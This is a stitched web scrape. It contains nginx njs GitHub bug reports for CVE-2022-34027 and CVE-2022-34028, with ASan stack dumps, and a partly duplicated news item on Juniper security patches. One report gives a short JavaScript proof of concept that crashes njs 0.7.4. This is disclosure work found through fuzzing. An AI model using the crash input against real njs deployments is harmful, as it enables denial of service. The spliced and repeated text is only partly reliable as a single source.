        #11 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
        #12 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #13 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #14 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #15 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #16 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #17 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #18 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #19 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #20 0x7f83cfee1082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #21 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_utf8.h:52:9 in njs_utf8_next
    ==9418==ABORTING
    
    

Credit  
dramthy(@topsec alpha)

CVE-2022-34028: SEGV src/njs_utf8.h:52:9 in njs_utf8_next · Issue #522 · nginx/njs

Nginx NJS v0.7.4 was discovered to contain a segmentation violation via njs_value_property at njs_value.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

dramthy opened this issue

May 19, 2022

· 0 comments

**Comments**

Environment

Commit  : 6cef7f5055ec24275f0ae121c7f8709ff3e0c454
Version : 0.7.4
Build   : 
     ./configure \--cc\=clang \--address\-sanitizer\=YES     
     make

Proof of concept

    // minified
    function f() {}                                                                                                                         
    Object.defineProperty(f, 'length', {set: () => {}});                                                                                    
    Object.defineProperty(f, 'length', Object.getOwnPropertyDescriptor([], 'length'));                                                      
    f.length  
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==25984==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004ea634 bp 0x7ffdd4213270 sp 0x7ffdd42130c0 T0)
    ==25984==The signal is caused by a READ memory access.
    ==25984==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
        #0 0x4ea634 in njs_value_property /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_value.c:1083:19
        #1 0x521273 in njs_object_length /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_object.c:2628:11
        #2 0x600a64 in njs_promise_race /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_promise.c:1727:11
        #3 0x54c08e in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:728:11
        #4 0x54a9a7 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:766:16
        #5 0x4f9b4f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_vmcode.c:799:23
        #6 0x54b526 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:693:11
        #7 0x54a9b9 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:769:16
        #8 0x4f9b4f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_vmcode.c:799:23
        #9 0x4f25ba in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_vm.c:541:11
        #10 0x4de3fd in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_shell.c:890:19
        #11 0x4dd98f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_shell.c:619:11
        #12 0x4dd98f in main /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_shell.c:303:15
        #13 0x7f7bafed2082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #14 0x41ea5d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-asan/build/njs+0x41ea5d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_value.c:1083:19 in njs_value_property
    ==25984==ABORTING
    
    
    

Credit  
dramthy(@topsec alpha)

 dramthy changed the title SEGV njs\_value.c:1083:19 in njs\_value\_property SEGV njs\_value.c:1083:19 in njs\_value\_property #bug #fuzzer

May 19, 2022

 dramthy changed the title SEGV njs\_value.c:1083:19 in njs\_value\_property #bug #fuzzer SEGV njs\_value.c:1083:19 in njs\_value\_property

May 19, 2022

2 participants

CVE-2022-34027: SEGV njs_value.c:1083:19 in njs_value_property · Issue #504 · nginx/njs

Juniper Networks has pushed security updates to address several vulnerabilities affecting multiple products, some of which could be exploited to seize control of affected systems.
The most critical of the flaws affect Junos Space and Contrail Networking, with the tech company urging customers to release versions 22.1R1 and 21.4.0, respectively.
Chief among them is a collection of 31 bugs in the

Juniper Networks has pushed security updates to address several vulnerabilities affecting multiple products, some of which could be exploited to seize control of affected systems.

The most critical of the flaws affect Junos Space and Contrail Networking, with the tech company urging customers to release versions 22.1R1 and 21.4.0, respectively.

Chief among them is a collection of 31 bugs in the Junos Space network management software, including CVE-2021-23017 (CVSS score: 9.4) that could result in a crash of vulnerable devices or even achieve arbitrary code execution.

"A security issue in nginx resolver was identified, which might allow an attacker who is able to forge UDP packets from the DNS server to cause 1-byte memory overwrite, resulting in worker process crash or potential other impact," the company said.

The same security vulnerability has also been remediated in Northstar Controller in versions 5.1.0 Service Pack 6 and 6.2.2.

Additionally, the networking equipment maker cautioned of multiple known issues exist in CentOS 6.8 that's shipped with Junos Space Policy Enforcer before version 22.1R1. As mitigations, the version of CentOS packed with the Policy Enforcer component has been upgraded to 7.9.

Also listed are 166 security vulnerabilities impacting its Contrail Networking product that impact all versions prior to 21.4.0 and have been collectively given the maximum CVSS score of 10.0.

"Multiple vulnerabilities in third party software used in Juniper Networks Contrail Networking have been resolved in release 21.4.0 by upgrading the Open Container Initiative (OCI)-compliant Red Hat Universal Base Image (UBI) container image from Red Hat Enterprise Linux 7 to Red Hat Enterprise Linux 8," it noted in an advisory.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#nginx